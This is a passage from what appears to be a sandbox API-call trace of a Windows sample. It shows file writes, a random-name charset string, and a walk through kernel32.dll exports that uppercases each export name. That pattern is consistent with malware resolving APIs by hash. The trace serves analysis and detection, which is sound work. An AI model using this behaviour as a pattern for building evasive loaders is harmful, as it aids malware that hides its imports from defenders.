returned 1 [0083.322] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.323] CloseHandle (hObject=0x444) returned 1 [0083.323] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.323] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.324] CloseHandle (hObject=0x0) returned 0 [0083.324] CloseHandle (hObject=0x440) returned 1 [0083.324] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.324] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.324] GetTickCount () returned 0x114d4cd [0083.324] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.324] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.324] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.325] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.325] lstrlenA (lpString="kernel32.dll") returned 12 [0083.325] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.325] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.325] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.325] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.325] lstrlenA (lpString="ADDATOMA") returned 8 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.325] lstrlenA (lpString="ADDATOMW") returned 8 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.325] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.325] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.325] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.326] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.326] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.326] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.326] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.326] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.326] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.326] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.326] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.326] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.326] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.326] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.326] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.326] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.326] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.326] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.326] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.326] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.326] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.326] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.326] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.327] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.327] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.327] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.327] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.327] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.327] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.327] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.327] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.327] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.327] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.327] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.327] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.327] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.327] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.327] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.327] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.327] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.327] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.327] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.328] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.328] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.328] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.328] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.328] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.328] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.328] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.328] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.328] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.328] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.328] lstrlenA (lpString="BEEP") returned 4 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.328] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.328] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.328] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.328] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.328] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.328] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.328] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.328] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.329] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.329] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.329] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.329] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.329] lstrlenA (lpString="CANCELIO") returned 8 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.329] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.329] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.329] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.329] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.329] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.329] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.329] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.329] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.329] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.329] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.329] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.329] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.329] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.329] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.330] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.330] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.330] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.330] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.330] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.330] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.330] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.330] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.330] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.330] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.330] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.330] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.330] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.330] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.330] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.331] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.331] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.331] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.331] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.331] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.331] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.331] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.331] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.331] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.331] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.331] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.331] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.331] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.331] lstrlenA (lpString="COPYFILEA") returned 9 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.331] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.331] lstrcpyA (in: lpString1=0x3f2d1ec, 